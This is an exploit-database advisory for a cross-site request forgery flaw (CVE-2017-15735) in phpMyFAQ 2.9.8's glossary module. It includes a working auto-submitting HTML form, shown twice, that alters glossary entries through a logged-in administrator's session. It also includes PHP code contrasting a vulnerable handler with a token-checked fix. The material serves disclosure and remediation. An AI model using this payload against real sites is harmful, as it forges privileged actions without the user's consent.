[webapps] phpMyFAQ 2.9.8 - Cross-Site Request Forgery (CSRF)
phpMyFAQ 2.9.8 contains a cross-site request forgery (CSRF) vulnerability affecting the add, update and delete operations of the glossary module. An attacker can craft a malicious page that induces an authenticated user to perform unauthorized operations. The patch added CSRF token validation to fix the issue. 2025-12-3 00:0:0 Author: www.exploit-db.com

# Exploit Title: phpMyFAQ 2.9.8 Cross-Site Request Forgery (CSRF)
# Date: 2024-10-26
# Exploit Author: CodeSecLab
# Vendor Homepage: https://github.com/thorsten/phpMyFAQ
# Software Link: https://github.com/thorsten/phpMyFAQ
# Version: 2.9.8
# Tested on: Ubuntu, Windows
# CVE : CVE-2017-15735

PoC: 
While still logged in, open another browser window: 
<html>
   <body>
      <form action="http://phpmyfaq/admin/index.php?action=updateglossary" method="POST">
         <input type="hidden" name="id" value="1">
         <input type="hidden" name="item" value="Malicious Glossary Item">
         <input type="hidden" name="definition" value="This is a malicious definition.">
         <input type="submit" value="Submit request">
      </form>
      <script>
         document.forms[0].submit();
      </script>
   </body>
</html>

Some Details:
{
    "Protection Mechanisms Before Patch": "There was no CSRF token validation in place for the glossary modification actions (add, update, delete). The patch introduced CSRF token checks for both POST and GET requests to ensure that only authorized sessions could perform these actions.",
    "File Navigation Chain": "Public Access Entry URL -> phpmyfaq/admin/index.php -> glossary.main.php -> glossary.edit.php",
    "Execution Path Constraints": "The user must be authenticated with the necessary permissions ('editglossary') to reach and interact with the glossary functionality through the 'index.php' entry point. Without proper authentication, the server redirects to the login form.",
    "Request Parameters": "id, item, definition",
    "Request Method": "POST",
    "Request URL": "http://phpmyfaq/admin/index.php?action=updateglossary",
    "Final PoC": "```\n<html>\n   <body>\n      <form action=\"http://phpmyfaq/admin/index.php?action=updateglossary\" method=\"POST\">\n         <input type=\"hidden\" name=\"id\" value=\"1\">\n         <input type=\"hidden\" name=\"item\" value=\"Malicious Glossary Item\">\n         <input type=\"hidden\" name=\"definition\" value=\"This is a malicious definition.\">\n         <input type=\"submit\" value=\"Submit request\">\n      </form>\n      <script>document.forms[0].submit();</script>\n   </body>\n</html>\n```"
}
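The "Some Details" block states that the patch added CSRF token checks to the glossary actions. The following is an added example, not phpMyFAQ's own code, showing the handler pattern before and after such a fix in the project's language. All function names and the `csrf` parameter name are hypothetical, `userHasPermission` is a simplified stand-in for the real `editglossary` permission check, and the request arrays are constructed to mirror the PoC form above.

```php
<?php
// Added example, not phpMyFAQ's own code: a minimal glossary-update handler
// showing the weakness and the fix the advisory describes. All function and
// parameter names (csrfToken, updateGlossary*, 'csrf', userHasPermission) are
// hypothetical; they are not phpMyFAQ's identifiers.

session_start();

// Simplified stand-in for the application's permission check ('editglossary').
function userHasPermission(string $perm): bool
{
    return in_array($perm, $_SESSION['permissions'] ?? [], true);
}

// Issue one unguessable token per session and reuse it for every form.
function csrfToken(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Hidden field to embed in the site's own glossary forms; the same token must
// also travel on GET links (e.g. a delete action), which the patch covers too.
function csrfHiddenField(): string
{
    return '<input type="hidden" name="csrf" value="'
        . htmlspecialchars(csrfToken(), ENT_QUOTES, 'UTF-8') . '">';
}

// Constant-time comparison of the submitted token with the session token.
function csrfTokenIsValid(?string $submitted): bool
{
    if ($submitted === null || empty($_SESSION['csrf_token'])) {
        return false;
    }
    return hash_equals($_SESSION['csrf_token'], $submitted);
}

// BEFORE (vulnerable pattern): authentication and the permission check are the
// only guards, so a form auto-submitted from another site while the editor is
// logged in is accepted, because the browser attaches the session cookie.
function updateGlossaryVulnerable(array $request, callable $save): bool
{
    if (!userHasPermission('editglossary')) {
        return false;
    }
    return $save((int) $request['id'], (string) $request['item'], (string) $request['definition']);
}

// AFTER (hardened pattern): additionally require the per-session token, which
// a cross-site page cannot read and therefore cannot place in its form.
function updateGlossaryHardened(array $request, callable $save): bool
{
    if (!userHasPermission('editglossary')) {
        return false;
    }
    if (!csrfTokenIsValid($request['csrf'] ?? null)) {
        http_response_code(403);
        return false;
    }
    return $save((int) $request['id'], (string) $request['item'], (string) $request['definition']);
}

// Constructed demo: a logged-in editor's session, a forged request carrying no
// token (what the PoC page above produces) and a legitimate one from our form.
$_SESSION['permissions'] = ['editglossary'];
$save = fn (int $id, string $item, string $definition): bool => true; // stand-in for the DB write

$forged     = ['id' => 1, 'item' => 'Malicious Glossary Item', 'definition' => 'This is a malicious definition.'];
$legitimate = $forged + ['csrf' => csrfToken()];

var_dump(updateGlossaryVulnerable($forged, $save));   // accepted: the weakness
var_dump(updateGlossaryHardened($forged, $save));     // rejected: no token
var_dump(updateGlossaryHardened($legitimate, $save)); // accepted: token present
```

The token must be checked on every state-changing entry point, including the GET-driven delete action the advisory mentions, since a check on `updateglossary` alone leaves the other actions forgeable. Setting the session cookie with the `SameSite` attribute is a complementary browser-side layer, not a substitute for the server-side token check.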

[Replace Your Domain Name]

Article source: https://www.exploit-db.com/exploits/52458